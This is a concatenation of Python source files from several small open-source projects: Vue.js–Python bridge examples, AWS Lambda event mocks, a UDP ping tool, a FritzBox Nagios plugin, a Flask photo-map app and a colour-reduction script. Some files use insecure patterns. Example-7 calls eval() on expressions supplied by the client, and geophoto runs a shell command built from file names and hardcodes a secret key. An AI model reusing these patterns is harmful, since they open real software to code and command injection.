self.raiseEvent('itemsAdded', items=seq, index=insertIndex)
def pop(self, index=-1):
removedIndex = index
if (index == -1):
removedIndex = len(self) - 1
value = list.pop(self, index)
self.raiseEvent('itemsRemoved', items=[value], index=removedIndex)
return value
def remove(self, obj):
index = self.index(obj)
list.remove(self, obj)
self.raiseEvent('itemsRemoved', items=[obj], index=index)
def sort(self, **kwargs):
list.sort(self, **kwargs)
self.raiseEvent('sorted')
def reverse(self):
list.reverse(self)
self.raiseEvent('reversed')
|
twitwi/vuejs-python | examples/example-1.py | <gh_stars>10-100
import asyncio
import vuejspython
@vuejspython.model
class Comp:
# define properties to forward to vue (synchronized state)
suggestions = ['+1', 'ToTo']
title = 'Test1'
i = 42
i2_withwatch = -1
subtitle = 'very local'
_v_novue = ['subtitle'] # property names to exclude from the synchronized state
def __init__(self):
self.i = 10
# just for the example, starts a loop that increments every few seconds
asyncio.ensure_future(self.demo_incr(1, 2))
def watch_i(self, i):
print("TEST: UPDATING i2_withwatch")
self.i2_withwatch = i*i
def computed_i2(self):
print("TEST: COMPUTING i2")
return self.i**2
async def demo_incr(self, t, v):
while True:
await asyncio.sleep(t)
self.i += v
def meth1(self, v):
print("TEST: COMMAND", v)
self.subtitle = "Changed: "+v # will not trigger change as _novue
if v == '+1':
self.i += 1
async def meth2(self, v):
await asyncio.sleep(1)
return str(v[::-1])
def meth3(self, v):
return str(v[::-1])
def clone(self, v):
print("TEST: CLONE", type(self.suggestions))
self.suggestions += [v]
vuejspython.start(Comp())
|
twitwi/vuejs-python | setup.py | <gh_stars>10-100
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read().split('----')[0]
setuptools.setup(
name="vuejspython",
version="0.2.6",
author="<NAME>",
author_email="<EMAIL>",
description="Bridging vuejs and python (e.g., to leverage numpy)",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/twitwi/vuejs-python/",
install_requires=['aiohttp', 'websockets'],
packages=setuptools.find_packages(),
package_data={
'vuejspython.static': ['*.js', '*.css']
},
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
|
twitwi/vuejs-python | examples/example-4.py | <reponame>twitwi/vuejs-python
import asyncio
import numpy as np
import matplotlib.pyplot as plt
import os
from vuejspython import model, start
@model
class Comp:
# define properties to forward to vue (or not)
i = 42
fname = ""
def __init__(self):
self.i = 1
def watch_i(self, i):
d = ",,ex4"
if not os.path.exists(d):
os.makedirs(d)
fname = d+"/fname-"+str(self.i)+".svg"
x = np.linspace(0, 100, 1000)
y = x-i
y[y<0] = 0
plt.figure()
plt.grid()
plt.plot(x, y)
plt.savefig(fname)
plt.close()
self.fname = fname
start(Comp())
|
twitwi/vuejs-python | vuejspython/static/__init__.py | <gh_stars>10-100
# to help the packager
|
twitwi/vuejs-python | examples/example-5.py |
import asyncio
from vuejspython import model, start
import numpy as np
import matplotlib.pyplot as plt
import io
import base64
@model
class Comp:
# define properties to forward to vue (or not)
gamma = 1.0
svg = ""
png = ""
use_svg = True
use_png = True
show_points = True
show_nn = True
def __init__(self):
self.draw_dataset()
def draw_dataset(self):
self.y = np.linspace(-0.87, 0.87, 103)[None, :, None]
self.x = np.linspace(-1.3, 1.3, 91)[:, None, None]
self.xp = np.array([0, 0.75])[None,None,:]
self.yp = np.array([0, 0])[None,None,:]
rangle = np.random.uniform(0, np.pi*4/3, (1, 1, 300))
rradius = np.random.uniform(1, 1.7, rangle.shape)
self.xm = rradius * np.cos(rangle)
self.ym = rradius*4/6 * np.sin(rangle)
d1m = np.min( ((self.x-self.xm)**2 + (self.y-self.ym)**2)**0.5, axis=2)
d1p = np.min( ((self.x-self.xp)**2 + (self.y-self.yp)**2)**0.5, axis=2)
s = d1m/(d1p+.0001)
self.im = np.transpose(s)
def watch_show_points(self, _): self.watch_gamma(self.gamma)
def watch_show_nn(self, _): self.watch_gamma(self.gamma)
def watch_gamma(self, ga):
x = self.x
y = self.y
im = self.im
xp, yp = self.xp, self.yp
xm, ym = self.xm, self.ym
plt.figure()
if self.show_nn:
CS = plt.contour(im, extent=[x.min(), x.max(), y.min(), y.max()], levels=[1], colors=['k'], linewidths=[3])
CS = plt.contour(im, extent=[x.min(), x.max(), y.min(), y.max()], levels=[ga])
###plt.clabel(CS)
plt.xlim([x.min(), x.max()])
plt.ylim([y.min(), y.max()])
if self.show_points:
plt.scatter(xp, yp, marker='+')
plt.scatter(xm, ym, marker='.')
plt.xticks([]) ; plt.yticks([])
if self.use_png:
b = io.BytesIO()
plt.savefig(b, format="png")
self.png = base64.b64encode(b.getvalue()).decode()
b.close()
if self.use_svg:
s = io.StringIO()
plt.savefig(s, format="svg")
self.svg = s.getvalue()
s.close()
plt.close()
start(Comp())
|
twitwi/vuejs-python | examples/example-2.py |
import asyncio
import vuejspython
import numpy as np
@vuejspython.model # this annotation could start the things automatically (if there is a single model anyway)
class Comp:
# define properties to forward to vue (or not)
currentClass = 0
currentShapelet = 0
currentImage = ''
folder, groups, scale = 'unzip-nouveau', [30, 30, 30], 100
#folder, groups, scale = 'epoch8000', [40, 40, 40], 1
_v_nobroadcast = ['wa']
def __init__(self):
# can add local properties here (to avoid having to fill _novue)
self.weight_dense = np.genfromtxt(self.folder+'/weight_dense.txt')
self.activations = np.hstack([
np.genfromtxt(self.folder+'/mp_shapelet_group_'+str(i)+'.txt') for i in range(len(self.groups))
])
def computed_wa(self):
a = self.activations # ts, sh
w = self.weight_dense # sh, cl
wa = a[:,:,None] * w[None, :, :] # ts, sh, cl
return wa
def computed_importance(self):
cc = self.currentClass
n_c = self.weight_dense.shape[1]
wa = self.wa
mean_others = wa[:, :, np.arange(n_c) != cc].mean(axis=2)
return np.mean(wa[:,:,cc] - mean_others, axis=0) * self.scale
def computed_importance2(self):
cc = self.currentClass
n_c = self.weight_dense.shape[1]
wa = self.wa
max_others = wa[:, :, np.arange(n_c) != cc].max(axis=2)
return np.mean(wa[:,:,cc] - max_others, axis=0) * self.scale
def computed_importance3(self):
cc = self.currentClass
n_c = self.weight_dense.shape[1]
n_sh = self.weight_dense.shape[0]
wa = self.wa
cla = wa.sum(axis=1) # ts, cl
clp = np.exp(cla) / np.sum(np.exp(cla), axis=1, keepdims=True) # ts, cl
def diffp(sh):
no_cla = wa[:, np.arange(n_sh) != sh, :].sum(axis=1)
no_cla = np.exp(no_cla)
no_clp = no_cla / np.sum(no_cla, axis=1, keepdims=True)
#d = clp[:, :] - no_clp[:, :]
d = clp[:, cc] - no_clp[:, cc]
#d[d<0.2] = 0
d[d<0.01] = 0
return np.mean(d)
#self.importance3 = [diffp(sh) * 100000 for sh in range(n_sh)]
imp3 = np.array([diffp(sh) for sh in range(n_sh)])
imp3 *= 200/np.max(imp3)
return imp3
def watch_currentShapelet(self, cs):
# up current image
g = 0
while cs >= self.groups[g]:
cs -= self.groups[g]
g += 1
self.currentImage = f'{self.folder}/plot/group{g}_shapelet{cs}.png'
m = Comp()
vuejspython.start(Comp(), py_port=4242)
|
twitwi/vuejs-python | examples/example-7.py | <gh_stars>10-100
from vuejspython import model, start
@model
class Comp:
# define properties to forward to vue (or not)
i_name = 'l'
o_name = 's'
slice_expr = '5:15'
is_error = False
input_expr = str(list(range(40,60)))
def __init__(self):
pass
def computed_input(self):
try:
res = eval(self.input_expr)
if type(res) is list: return res
return []
except:
return []
def computed_taginput(self):
return ['%s#%03d'%(str(v), i) for i,v in enumerate(self.input)]
def computed_tagoutput(self):
try:
locals()[self.i_name] = self.input
locals()['___'+self.i_name] = self.taginput
res = eval('___%s[%s]'%(self.i_name, self.slice_expr))
self.is_error = False
return res
except Exception as e:
self.is_error = True
self.error_message = str(e)
return []
start(Comp())
|
twitwi/vuejs-python | examples/example-8.py | <reponame>twitwi/vuejs-python
import asyncio
from vuejspython import model, start
@model
class Comp:
# define properties to forward to vue (or not)
i = 42
def __init__(self):
self.i = 1
def computed_sqrd(self):
return self.i ** 2
def incr(self, d):
self.i += d
@model
class Dummy:
i = 3
def incr(self, d):
self.i += d
@model
class Square:
props = ['val'] # python defined props
val = 0 # need a value for typing reasons, maybe this will change
# TODO? consider a more vuejs syntax like: props = {'val': {'default': 0}}
def computed_square(self):
return self.val ** 2
start(Comp())
|
Abir-H/serverless-event-mocks-python | serverless_event_mocks/__init__.py | <filename>serverless_event_mocks/__init__.py
from serverless_event_mocks.event import create_event
|
Abir-H/serverless-event-mocks-python | setup.py | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name='serverless-event-mocks',
packages=['serverless_event_mocks'],
version='0.0.7',
license='MIT',
description='A small Python library that includes details mocks of AWS Lambda event sources.',
long_description=long_description,
long_description_content_type="text/markdown",
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/abirhoss/serverless-event-mocks',
download_url='https://github.com/abirhoss/serverless-event-mocks/archive/v0.0.7.tar.gz',
keywords=['serverless', 'serverless-framework', 'unittest', 'mock', 'events', 'aws-lambda'],
classifiers=[
"Development Status :: 4 - Beta",
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
include_package_data=True
)
|
Abir-H/serverless-event-mocks-python | serverless_event_mocks/tests/test_event.py | <gh_stars>1-10
from unittest import TestCase
from serverless_event_mocks.event import create_event
class TestEvent(TestCase):
def test_create_event_aws_api_gateway(self):
# Arrange
provider = 'aws'
event_type = 'api_gateway'
event_payload = {
"body": {
"first_name": "Sam",
"last_name": "Smith"
}
}
# Act
event = create_event(provider, event_type, event_payload)
# Assert
self.assertTrue(isinstance(event, dict))
self.assertTrue(event.get('body'))
|
Abir-H/serverless-event-mocks-python | serverless_event_mocks/event.py | import json
from pathlib import Path
VALID_PROVIDERS = ['aws']
VALID_EVENT_TYPES = ['api_gateway']
EVENT_TEMPLATES_EXT = 'json'
EVENT_TEMPLATES_DIR = Path(__file__).resolve().parent / 'event_templates'
def create_event(provider: str, event_type: str, event_payload: dict) -> dict:
"""Create a mock serverless event"""
# Validate provider
if not _validate_provider(provider):
raise KeyError(f"Invalid provider '{provider}'. Valid providers: {VALID_PROVIDERS}")
# Validate event type
if not _validate_event_type(event_type):
raise KeyError(f"Invalid event_type '{event_type}'. Valid event types: {VALID_EVENT_TYPES}")
# Validate event payload
if not _validate_event_payload(event_payload):
raise TypeError(f"Invalid event_payload type. Must be of '{dict}', '{type(event_payload)}' given")
# Load event template
event_template = _load_event_template(provider, event_type)
# Return new merged event
return {**event_template, **event_payload}
def _load_event_template(provider: str, event_type: str) -> dict:
event_template_path = Path(f"{EVENT_TEMPLATES_DIR}/{provider}/{event_type}.{EVENT_TEMPLATES_EXT}")
with open(event_template_path) as event_template_file:
return json.load(event_template_file)
def _validate_provider(provider: str) -> bool:
return provider in VALID_PROVIDERS
def _validate_event_type(event_type: str) -> bool:
return event_type in VALID_EVENT_TYPES
def _validate_event_payload(event_payload: dict) -> bool:
return isinstance(event_payload, dict)
|
mhmddpkts/UDP-Socket | Receiver.py | import socket
server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #UDP ' ye uygun bir soket nesnesi oluşturuldu.
server_socket.bind(('', 25400)) #Port belirlendi.
while True: #Belirlenen Port Dinleniyor..
message, address = server_socket.recvfrom(1024) #gelen mesajı al
print("Ip :",address[0]," Client Portu:",address[1]) #ekrana paket bilgisi yazdırıldı.
server_socket.sendto(message, address) #client'a cevap verildi.
|
mhmddpkts/UDP-Socket | Sender.py | <reponame>mhmddpkts/UDP-Socket
#****** SENDER *****
import time
import socket
IP = input("ENTER IP : ") #Hedef IP adresi alındı.
adress = (IP, 25400) #Port numarası ve IP ile adres oluşturuldu.
PacketCounter = 0 #Toplam paket sayacına başlangıç değeri atandı.
PacketLossCounter = 0 #Kayıp paket sayacına başlangıç değeri atandı.
client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #UDP'ye uygun bir socket nesnesi oluşturuldu.
client_socket.settimeout(2.0) #Timeout süresi 2 sn olarak belirlendi.
for pings in range(1, 7): #6 paket için gerekli döngü
message = str(pings)+". Ping Message" #Mesaj oluşturuldu.
message = message.encode() #Binary formata çevirildi.
start = time.time() #Paketin göderilmeye başlandığı zaman tutuldu.
client_socket.sendto(message, adress) #Paket gönderildi
PacketCounter = PacketCounter+1 #Toplam paket sayacı 1 artırıldı.
try:
data, server = client_socket.recvfrom(1024) #gönderilen mesajdan cevap geldi.
end = time.time() #pakedin cevap gelme süresi tutuldu.
elapsed = end - start #Cevap gelmesi için gereken süre bulundu.
print(f'+ Data : {data} - Size : {len(data)}byte - Ping : {pings} - Time : {elapsed}sn State : OK')#Paket Bilgileri yazıdırıldı
except socket.timeout: #Timeout hatası yakalanır ise
PacketLossCounter = PacketLossCounter+1 #Kayıp paket sayacını artır.
print("- Ping ", pings, ': REQUEST TIMED OUT - State : Failed') #Ekrana hangi ping in Timeout Olduğu mesajını göster.
#Sonuç Çıktısı
print("\n\n\t\t\t\t\t\t\t\t\t\t|*** RESULT *** |\n")
print(f" IP : [{IP}] - Total Packet Count : [{PacketCounter}] - Arrived Packet Count: [{PacketCounter-PacketLossCounter}]"
f" - Packet Loss Count : [{PacketLossCounter}]")
|
cicerops/fritznagios | fritznagios.py | <filename>fritznagios.py
"""
fritznagios.py
Module for Nagios/Icinga2 to query the FritzBox API for available services and actions.
License: MIT (https://opensource.org/licenses/MIT)
Author: <NAME>
Source: https://github.com/cicerops/fritznagios
This module depends on the FritzConnection module.
Source: https://github.com/kbr/fritzconnection
"""
import argparse
import datetime
import ipaddress
import math
import os
from fritzconnection.core.exceptions import FritzActionError, FritzServiceError
from fritzconnection.core.fritzconnection import FRITZ_IP_ADDRESS, FRITZ_TCP_PORT
from fritzconnection.lib.fritzstatus import FritzStatus
class Nagios:
def __init__(self):
self.fs = None
self.modes = ["ip", "uptime", "bytes", "bitrate"]
self.default_mode = self.modes[0]
self.args = self.get_cli_arguments()
self.state = "OK"
def set_fs(self):
self.fs = self.get_instance(FritzStatus, self.args)
def main(self):
if self.args.mode == "uptime":
if not self.args.password:
print("Exit: -p password required.")
exit()
if self.args.warning:
try:
self.args.warning = int(self.args.warning)
except:
print("Exit: -w Warning level as int required.")
exit()
if self.args.critical:
try:
self.args.critical = int(self.args.critical)
except:
print("Error: -c Critical level as int required.")
exit()
if self.args.mode not in self.modes:
print("Exit: -m Requires something like %s" % self.modes)
else:
self.set_fs()
if self.args.mode in self.modes:
fun = getattr(Nagios, self.args.mode)
fun(self)
def uptime(self):
device_uptime = self.get_information("device_uptime")
connection_uptime = self.get_information("connection_uptime")
device_uptime = str(datetime.timedelta(seconds=device_uptime))
connection_uptime = str(datetime.timedelta(seconds=connection_uptime))
print(self.state + " - DeviceUptime: %s ConnectionUptime: %s" % (device_uptime, connection_uptime))
def bytes(self):
bytes_sent = self.get_information("bytes_sent")
bytes_received = self.get_information("bytes_received")
bytes_sent = bytes_sent / 1000
bytes_received = bytes_received / 1000
unit_s = "KB"
unit_r = "KB"
if bytes_sent > 1024:
bytes_sent = round(bytes_sent / 1000, 2)
unit_s = "MB"
if bytes_sent > 1024:
bytes_sent = round(bytes_sent / 1000, 2)
unit_s = "GB"
if bytes_received > 1024:
bytes_received = round(bytes_received / 1000, 2)
unit_r = "MB"
if bytes_received > 1024:
bytes_received = round(bytes_received / 1000, 2)
unit_r = "GB"
print(self.state + " - received: %s" % bytes_received + unit_r + " sent: %s" % bytes_sent + unit_s)
def ip(self):
counter = 0
ipv4 = False
ipv6 = False
ipv4 = self.get_information("external_ip")
ipv6 = self.get_information("external_ipv6")
if ipv4:
ipv4 = ipaddress.ip_address(ipv4)
counter += 1
if ipv6:
ipv6 = ipaddress.ip_address(ipv6)
counter += 1
self.set_state(counter)
if ipv4 and ipv6:
print(self.state + " - IPv4: %s, IPv6: %s" % (ipv4, ipv6))
elif ipv4:
print(self.state + " - IPv4: %s" % ipv4)
elif ipv6:
print(self.state + " - IPv6: %s" % ipv6)
else:
print(self.state + " - No IP Address.")
def bitrate(self):
max_bit_rate = self.get_information("max_bit_rate")
str_max_bit_rate = self.get_information("str_max_bit_rate")
value = int(math.ceil(float(max_bit_rate[1] / 1000000)))
self.set_state(value)
print(self.state + " - DownlinkBitRate: %s UplinkBitRate: %s" % (str_max_bit_rate[1], str_max_bit_rate[0]))
def get_information(self, attribute):
try:
information = getattr(self.fs, attribute)
except (FritzServiceError, FritzActionError):
information = f'unsupported attribute "{attribute}"'
return information
def set_state(self, value):
if self.args.warning > value:
self.state = "WARNING"
if self.args.critical > value:
self.state = "CRITICAL"
def get_instance(self, cls, args):
return cls(
address=args.address,
port=args.port,
user=args.username,
password=args.password,
use_tls=args.encrypt,
)
def get_cli_arguments(self):
parser = argparse.ArgumentParser()
parser.add_argument(
"-i",
"--ip-address",
nargs="?",
default=FRITZ_IP_ADDRESS,
const=None,
dest="address",
help="Specify ip-address of the FritzBox to connect to." "Default: %s" % FRITZ_IP_ADDRESS,
)
parser.add_argument(
"--port",
nargs="?",
default=None,
const=None,
help="Port of the FritzBox to connect to. " "Default: %s" % FRITZ_TCP_PORT,
)
parser.add_argument(
"-u",
"--username",
nargs="?",
default=os.getenv("FRITZ_USERNAME", None),
help="Fritzbox authentication username",
)
parser.add_argument(
"-p",
"--password",
nargs="?",
default=os.getenv("FRITZ_PASSWORD", None),
help="Fritzbox authentication password",
)
parser.add_argument("-e", "--encrypt", nargs="?", default=False, const=True, help="use secure connection")
parser.add_argument(
"-m",
"--mode",
nargs="?",
default=self.default_mode,
const=True,
help="set a check mode: %s" % self.modes + " default: %s" % self.default_mode,
)
parser.add_argument("-w", "--warning", nargs="?", default=False, const=True, help="set warning level")
parser.add_argument("-c", "--critical", nargs="?", default=False, const=True, help="set critical level")
args = parser.parse_args()
return args
def main():
nagios = Nagios()
nagios.main()
if __name__ == "__main__":
main()
|
cicerops/fritznagios | setup.py | <reponame>cicerops/fritznagios
import os
from setuptools import setup
def read(path):
with open(os.path.join(os.path.dirname(__file__), path)) as f:
return f.read()
long_description = read("README.md")
setup(
name="fritznagios",
version="0.1.3",
url="https://github.com/cicerops/fritznagios",
author="<NAME>",
author_email="<EMAIL>",
description="Nagios/Icinga monitoring check program for FRITZ!Box devices",
long_description=long_description,
long_description_content_type="text/markdown",
platforms=["any"],
license="MIT",
keywords="FRITZ!Box, AVM, fritzbox, fritz, Nagios, Icinga, monitoring, TR-064, UPnP",
py_modules=["fritznagios"],
entry_points={"console_scripts": ["fritznagios = fritznagios:main"]},
python_requires=">=3.4",
install_requires=["fritzconnection>=1,<2"],
classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Operating System :: OS Independent",
"Environment :: Console",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Intended Audience :: Information Technology",
"Intended Audience :: Science/Research",
"Intended Audience :: System Administrators",
"Topic :: Communications",
"Topic :: Database",
"Topic :: Internet",
"Topic :: Scientific/Engineering :: Information Analysis",
"Topic :: Scientific/Engineering :: Interface Engine/Protocol Translator",
"Topic :: Software Development :: Libraries",
"Topic :: System :: Archiving",
"Topic :: System :: Logging",
"Topic :: System :: Monitoring",
"Topic :: System :: Systems Administration",
"Topic :: Text Processing",
"Topic :: Utilities",
],
)
|
cacahootie/geophoto | geophoto/views.py | <reponame>cacahootie/geophoto
import os
from functools import wraps
from flask import Flask, jsonify, render_template, request, abort
from geophoto import app, models, oembed
basedir = os.path.dirname(os.path.abspath(__file__))
index_path = os.path.join(basedir,'static','index.html')
def spa(vfunc):
@wraps(vfunc)
def wrapper(*args, **kwargs):
if request.args.get('format') == 'json':
return vfunc(*args, **kwargs)
else:
return render_template('index.html')
return wrapper
@app.route("/")
def index():
return render_template('index.html')
@app.route("/photos")
@spa
def photos():
return jsonify(models.photos())
@app.route("/articles")
@spa
def articles():
return jsonify(models.articles())
@app.route("/articles/<key>")
@spa
def article(key):
return jsonify(models.article(key))
@app.route("/tags/<id>", methods=["GET",])
@spa
def tags(id):
return jsonify(models.tags(id))
@app.route("/services/oembed/", methods=["GET",])
def oembed_service():
fmt = request.args.get("format")
if fmt is None or fmt == 'json':
return jsonify(oembed.oembed(request.args.get('url')))
elif fmt == 'html':
return oembed.oembed(request.args.get('url'))
abort(500)
@app.route("/tags/<id>", methods=["POST",])
@spa
def add_tags(id):
try:
return jsonify(models.add_tags(id, request.get_json()))
except ValueError:
abort(409)
|
cacahootie/geophoto | run.py | <gh_stars>0
from geophoto import app
if __name__ == "__main__":
app.secret_key = 'super secret key'
app.run(
host='0.0.0.0',
port=8008,
debug=True
)
|
cacahootie/geophoto | geophoto/models.py |
import codecs
from os import listdir, getcwd
from os.path import isfile, join
from itertools import repeat
import json
import hashlib
import subprocess
import psycopg2
import psycopg2.extras
import exifread
import markdown
img_path = './geophoto/static/img/geocoded'
img_in_path = './geophoto/static/img/geocoded_in'
article_path = './geophoto/articles'
web_path = '/static/img/geocoded/'
conn = psycopg2.connect("dbname='relately'")
conn.autocommit = True
def dms_to_decimal(value, hemi):
value = str(value).replace('[','').replace(']','').replace(' ','')
dms = value.split(',')
secs = dms[2].split('/')
try:
secs = float(secs[0]) / float(secs[1])
except IndexError:
secs = float(dms[2])
retval = float(dms[0]) + float(dms[1])/60 + secs/3600
hemi = str(hemi)
if hemi == 'W' or hemi == 'S':
retval *= -1.0
return retval
def _unprocessed_photos():
return set(f for f in listdir(img_in_path) if isfile(join(img_in_path, f)))
def _processed_photos():
return set(f for f in listdir(img_path) if isfile(join(img_path, f)))
def reorient(files):
for f in files:
subprocess.call(
"mogrify -path ./geophoto/static/img/geocoded -auto-orient './geophoto/static/img/geocoded_in/{}'".format(f),
shell=True
)
def get_photo_metadata(files):
results = []
for i, fn in enumerate(files):
if i % 100 == 0:
print "Extracting metadata for row {}".format(i)
tags = exifread.process_file(open(join(img_path,fn)), 'rb')
try:
results.append({
"src": web_path + fn,
"lat": dms_to_decimal(tags['GPS GPSLatitude'], tags['GPS GPSLatitudeRef']),
"lng": dms_to_decimal(tags['GPS GPSLongitude'], tags['GPS GPSLongitudeRef']),
"id": md5(fn)
})
except KeyError:
pass
rows = (
x for x in results
if isinstance(x['lat'],float)
and isinstance(x['lng'],float)
)
return rows
def insert_photo_metadata(rows):
with conn.cursor() as cur:
for i, row in enumerate(rows):
if i % 100 == 0:
print "Processing %i row" % i
try:
cur.execute("""
insert into geophoto.items(id, lat, lng, src, itemtype)
VALUES (%(id)s, %(lat)s, %(lng)s, %(src)s, 'photo')
ON CONFLICT DO NOTHING
""", row)
except psycopg2.IntegrityError:
print row
def process_photos():
files = _unprocessed_photos() - _processed_photos()
if len(files) < 0:
reorient()
else:
files = _processed_photos()
rows = get_photo_metadata(files)
insert_photo_metadata(rows)
return rows
def md5(fname):
hf = hashlib.md5()
with open(join(img_path,fname), "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hf.update(chunk)
return hf.hexdigest()
def photos():
with conn.cursor(cursor_factory=psycopg2.extras.DictCursor) as cur:
cur.execute("""
select id, lat, lng, src from geophoto.items
where itemtype = 'photo'
""")
return {"results": [dict(x) for x in cur] }
def articles():
articles = []
with open(join(article_path, 'index.json'), 'rb') as f:
article_index = json.load(f)
for key, item in article_index.items():
item['key'] = key
articles.append(item)
return { "results": articles }
def article(key):
with open(join(article_path, 'index.json'), 'rb') as f:
article_meta = json.load(f)[key]
with codecs.open(join(article_path, key), 'r', "utf-8") as f:
body = f.read()
article_meta['body'] = markdown.markdown(body, encoding="utf-8")
return article_meta
def tags(id):
with conn.cursor(cursor_factory=psycopg2.extras.DictCursor) as cur:
cur.execute("""
select tag from geophoto.tags
where id = %s
""", (id,))
return {"results": [dict(x) for x in cur] }
def add_tags(id, tags):
with conn.cursor(cursor_factory=psycopg2.extras.DictCursor) as cur:
try:
cur.executemany("""
insert into geophoto.tags VALUES (%s, %s)
""", zip(repeat(id), tags))
except psycopg2.IntegrityError:
raise ValueError("Tag already exists for this photo.")
cur.execute("""
select tag from tags
where id = %s
""", (id,))
return {"results": [dict(x) for x in cur] }
|
cacahootie/geophoto | geophoto/__init__.py | <filename>geophoto/__init__.py
import os
from flask import Flask
basedir = os.path.dirname(os.path.abspath(__file__))
index_path = os.path.join(basedir,'static','index.html')
app = Flask(
'geophoto',
static_folder=os.path.join(basedir,'static'),
static_url_path='/static'
)
import views
|
cacahootie/geophoto | manage.py | import subprocess
from flask.ext.script import Manager
from geophoto import app
from geophoto import models
manager = Manager(app)
@manager.command
def load():
models.process_photos()
@manager.command
def run():
app.secret_key = 'super secret key'
app.run(
host='0.0.0.0',
port=8008,
debug=True
)
if __name__ == "__main__":
manager.run()
|
cacahootie/geophoto | geophoto/oembed.py | <reponame>cacahootie/geophoto
from json import loads
from urlparse import urlparse
from flask import current_app as app
from flask import request
def thumbUrl(thumb):
return "https://venturelog.imgix.net/articles/" + thumb + \
"?w=200&h=150&fit=crop&crop=entropy&auto=compress,format"
def html(article):
return '<div><p>' + article['headline'] + '</p><p>' + article['leader'] + '</p></div>'
def oembed(url):
path = urlparse(url).path + "?format=json"
with app.test_client() as c:
rv = c.get(path)
try:
article = loads(rv.data)
except ValueError:
print url
print path
raise
if request.args.get("format") == "html":
return html(article)
return {
"success": True,
"type": "rich",
"version": "1.0",
"provider_name": "Venturelog",
"provider_url": "http://www.venturelog.io",
"title": article['headline'],
"author_name": "<NAME>",
"author_url": "http://www.venturelog.io",
"height": "300",
"width": "800",
"thumbnail_width": "200",
"thumbnail_height": str(int(200 * float(3)/4)),
"thumbnail_url": thumbUrl(article['thumbnail']),
"html": html(article)
}
|
N0star/pixacolor | pxc.py | <gh_stars>1-10
I = '''FDC # PXC # 1.0.0 # 2020'''
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import numpy as np
def upload(name): #get an image
img = mpimg.imread(name)
tab = []
for i in range(len(img)):
for j in range(len(img[i])):
tab.append(img[i][j])
print("table size: ",len(tab))
return tab, img
def minipix(xx,cc,idx): #reduce the colours
for i in range(len(xx)):
xx[i]=cc[idx[i]]
return xx
def download(xx,pic): #prepare to save
l1=len(pic[0])
l=len(pic)
pic = []
for i in range(l):
pas = []
for j in range(l1):
pix=xx[i*l1+j].astype(int)
pas.append(pix)
pic.append(pas)
return pic
def kc_init(xx, k): #init k-mean centroids
ridx = np.random.permutation(len(xx))
ctrd = xx[:k]
return ctrd
def find_cc(xx, cc): #find closest values
indx = []#; cmpl=int(len(xx)/25)
for i in range(len(xx)):
mval = 9999;
indx.append(0)
#if(0==((i)%cmpl)): print(".",end="");
for j in range(len(cc)):
val = xx[i]-cc[j];
val = np.linalg.norm(val)**2;
if val<mval:
mval=val;
indx[i]=j;
return indx
def ccc(xx,idx,k): #update centroids
cc = []; c = [];
for i in range(k):
col = np.array([])
for j in range(len(xx[i])):
col=np.append(col,0)
cc.append(col)
c.append(0)
for i in range(len(idx)): #idx==xx
cc[idx[i]]+=xx[i]
c[idx[i]]+=1
for i in range(k):
cc[i]/=c[i]
return cc
def setting(n=-1,k=-1):
if(n<0): n = input("Number of interations (int): ")
if(k<0): k = input("Number of colours (int): ")
n = int(n); k = int(k)%256;
print("File: ",name,", k=",k,", n=",n)
ch = input("Is this data correct? (Y/n): ")
if(ch=='Y' or ch=='y'): f=0;
else: f=1;
return f,tab,pic,n,k;
#tab, pic = upload("Homare.jpeg")
#k=8; tab = tab[:1000] # testing
tab = []; pic = []; img = False;
print("Welcome to Pixacolor!")
while True: # main menu # MAIN LOOP #
ch=input("\nu - upload, s - save,\nr - reduce colors\n"
+"i - info, q - quit.\n\n"); cmd=ch.split(); ch=ch[0];
upl = 0; red = 0; sav = 0; inf = 0; qui = 0;
for i in range(len(cmd)):
if(cmd[i]=='u'): #case upload
upl+=1;
try:
name=cmd[i+1] #req img name
upl+=1; j=0;
try:
if(cmd[i+2]=='r'): j=1;
n=int(cmd[i+2+j]);
k=int(cmd[i+3+j]);
upl+=1; red=2;
except IndexError: continue
except IndexError: continue
elif(cmd[i]=='r'): #case reduce
red=1;
try:
n=int(cmd[i+1]);
k=int(cmd[i+2]);
red=2;
except IndexError: continue
except ValueError: continue
elif(cmd[i]=='s' or cmd[i]=='as'): #case save
if(cmd[i]=='as'):
target=name+"_"+str(k)+"x"+str(n);
sav=2;
else:
sav=1;
try:
target=cmd[i+1]; sav=2;
except IndexError: continue
elif(cmd[i]=='i' ): inf=1; #case info
elif(cmd[i]=='q' ): qui=1; #case quit
if(ch=='q'): break;
if(upl>0):
if(upl<2):
name = input("Image name: ")
tab = []; pic = []; img = True;
try:
tab,pic = upload(name)
except FileNotFoundError:
img=False; print("File not found...");
if(red>0 or upl==3):
if(img):
if(red<2): f,tab,pic,itn,k = setting()
else: f,tab,pic,itn,k = setting(n,k)
if(not f):
cc = kc_init(tab,k)
for i in range(itn):
print("Searching...",i+1)
idx = find_cc(tab,cc)
print("Updating...",i+1)
cc = ccc(tab,idx,k)
print("Final search...")
idx = find_cc(tab,cc)
print("Reducing...")
xx = minipix(tab,cc,idx)
print("Completing...")
npic = download(xx,pic)
print("Ready!")
else: print("No image's been found!");
if(sav>0):
if(npic is not None):
if(sav<2):
print("Name file to save, or...\ntype 'show' to show instead")
name=input()
else: name=target;
fig = plt.matshow(npic)
if(name=='show'):
plt.show()
else:
name=name+".png"
plt.axis('off')
plt.savefig(name, bbox_inches='tight')
else: print("No image to save")
if(inf):
print(I);
if(qui): break;
|
twangnh/Distilling-Object-Detectors-Shuffledet | eval_model.py | <reponame>twangnh/Distilling-Object-Detectors-Shuffledet<filename>eval_model.py<gh_stars>10-100
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
